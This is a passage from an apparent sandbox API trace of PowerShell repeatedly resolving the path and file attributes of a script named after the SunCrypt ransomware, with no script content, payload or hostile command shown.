lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.339] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.349] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701716536257) returned 1 [0104.349] EtwEventActivityIdControl () returned 0x0 [0104.349] EtwEventActivityIdControl () returned 0x0 [0104.349] EtwEventActivityIdControl () returned 0x0 [0104.349] EtwEventActivityIdControl () returned 0x0 [0104.349] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x8d27c88d, Data2=0x2257, Data3=0x409f, Data4=([0]=0x85, [1]=0x94, [2]=0x2d, [3]=0x25, [4]=0xf, [5]=0xb6, [6]=0x5b, [7]=0x6b))) returned 0x0 [0104.350] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.350] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701716646323) returned 1 [0104.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.350] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.355] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701717111876) returned 1 [0104.355] EtwEventActivityIdControl () returned 0x0 [0104.355] EtwEventActivityIdControl () returned 0x0 [0104.355] EtwEventActivityIdControl () returned 0x0 [0104.355] EtwEventActivityIdControl () returned 0x0 [0104.355] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xda993602, Data2=0xa43f, Data3=0x4b48, Data4=([0]=0xa2, [1]=0x66, [2]=0xf2, [3]=0xb3, [4]=0x74, [5]=0x19, [6]=0x99, [7]=0x3c))) returned 0x0 [0104.355] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.356] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701717233910) returned 1 [0104.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.364] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701718085163) returned 1 [0104.364] EtwEventActivityIdControl () returned 0x0 [0104.364] EtwEventActivityIdControl () returned 0x0 [0104.364] EtwEventActivityIdControl () returned 0x0 [0104.365] EtwEventActivityIdControl () returned 0x0 [0104.583] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xab63dd40, Data2=0x831f, Data3=0x4a75, Data4=([0]=0x96, [1]=0xa3, [2]=0x33, [3]=0xbe, [4]=0x74, [5]=0x3a, [6]=0x68, [7]=0x15))) returned 0x0 [0104.584] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.584] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701740079484) returned 1 [0104.584] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.584] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.584] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.586] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701740266563) returned 1 [0104.586] EtwEventActivityIdControl () returned 0x0 [0104.586] EtwEventActivityIdControl () returned 0x0 [0104.586] EtwEventActivityIdControl () returned 0x0 [0104.587] EtwEventActivityIdControl () returned 0x0 [0104.587] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2880e5d1, Data2=0xc9ef, Data3=0x415d, Data4=([0]=0x8c, [1]=0x36, [2]=0x36, [3]=0xc0, [4]=0xce, [5]=0xcc, [6]=0x8b, [7]=0x13))) returned 0x0 [0104.587] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.587] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701740405697) returned 1 [0104.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.588] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.590] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701740647446) returned 1 [0104.590] EtwEventActivityIdControl () returned 0x0 [0104.590] EtwEventActivityIdControl () returned 0x0 [0104.590] EtwEventActivityIdControl () returned 0x0 [0104.590] EtwEventActivityIdControl () returned 0x0 [0104.590] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xb8ec975c, Data2=0x1f39, Data3=0x4742, Data4=([0]=0x99, [1]=0xe4, [2]=0x8, [3]=0x5d, [4]=0x7d, [5]=0x6a, [6]=0x9b, [7]=0x7f))) returned 0x0 [0104.591] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.591] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701740790534) returned 1 [0104.591] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.591] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.592] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.593] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701740959935) returned 1 [0104.593] EtwEventActivityIdControl () returned 0x0 [0104.593] EtwEventActivityIdControl () returned 0x0 [0104.593] EtwEventActivityIdControl () returned 0x0 [0104.593] EtwEventActivityIdControl () returned 0x0 [0104.593] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1e6838c, Data2=0x481f, Data3=0x4ed2, Data4=([0]=0x83, [1]=0xb6, [2]=0x6f, [3]=0x4, [4]=0x81, [5]=0xfc, [6]=0x9d, [7]=0xe6))) returned 0x0 [0104.594] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.594] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701741060899) returned 1 [0104.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.594] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.595] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.595] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.596] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701741244489) returned 1 [0104.596] EtwEventActivityIdControl () returned 0x0 [0104.596] EtwEventActivityIdControl () returned 0x0 [0104.596] EtwEventActivityIdControl () returned 0x0 [0104.596] EtwEventActivityIdControl () returned 0x0 [0104.596] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x6e930d73, Data2=0xad1f, Data3=0x4050, Data4=([0]=0x94, [1]=0x49, [2]=0xed, [3]=0x4c, [4]=0x5b, [5]=0x8e, [6]=0x71, [7]=0xb))) returned 0x0 [0104.597] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.597] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701741345640) returned 1 [0104.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.597] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.599] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701741521411) returned 1 [0104.599] EtwEventActivityIdControl () returned 0x0 [0104.599] EtwEventActivityIdControl () returned 0x0 [0104.599] EtwEventActivityIdControl () returned 0x0 [0104.599] EtwEventActivityIdControl () returned 0x0 [0104.599] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa01c6b6c, Data2=0x74bd, Data3=0x48a3, Data4=([0]=0xa4, [1]=0x50, [2]=0x4e, [3]=0xfe, [4]=0xe0, [5]=0xce, [6]=0x14, [7]=0x68))) returned 0x0 [0104.599] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.600] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701741626094) returned 1 [0104.600] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.600] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.600] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.600] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.600] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.601] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701741798584) returned 1 [0104.601] EtwEventActivityIdControl () returned 0x0 [0104.602] EtwEventActivityIdControl () returned 0x0 [0104.602] EtwEventActivityIdControl () returned 0x0 [0104.602] EtwEventActivityIdControl () returned 0x0 [0104.602] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x8e06c8c2, Data2=0x8092, Data3=0x45ab, Data4=([0]=0x97, [1]=0xf, [2]=0xdd, [3]=0xa7, [4]=0x9a, [5]=0xd2, [6]=0x1f, [7]=0x24))) returned 0x0 [0104.602] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.602] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701741895760) returned 1 [0104.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.603] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, 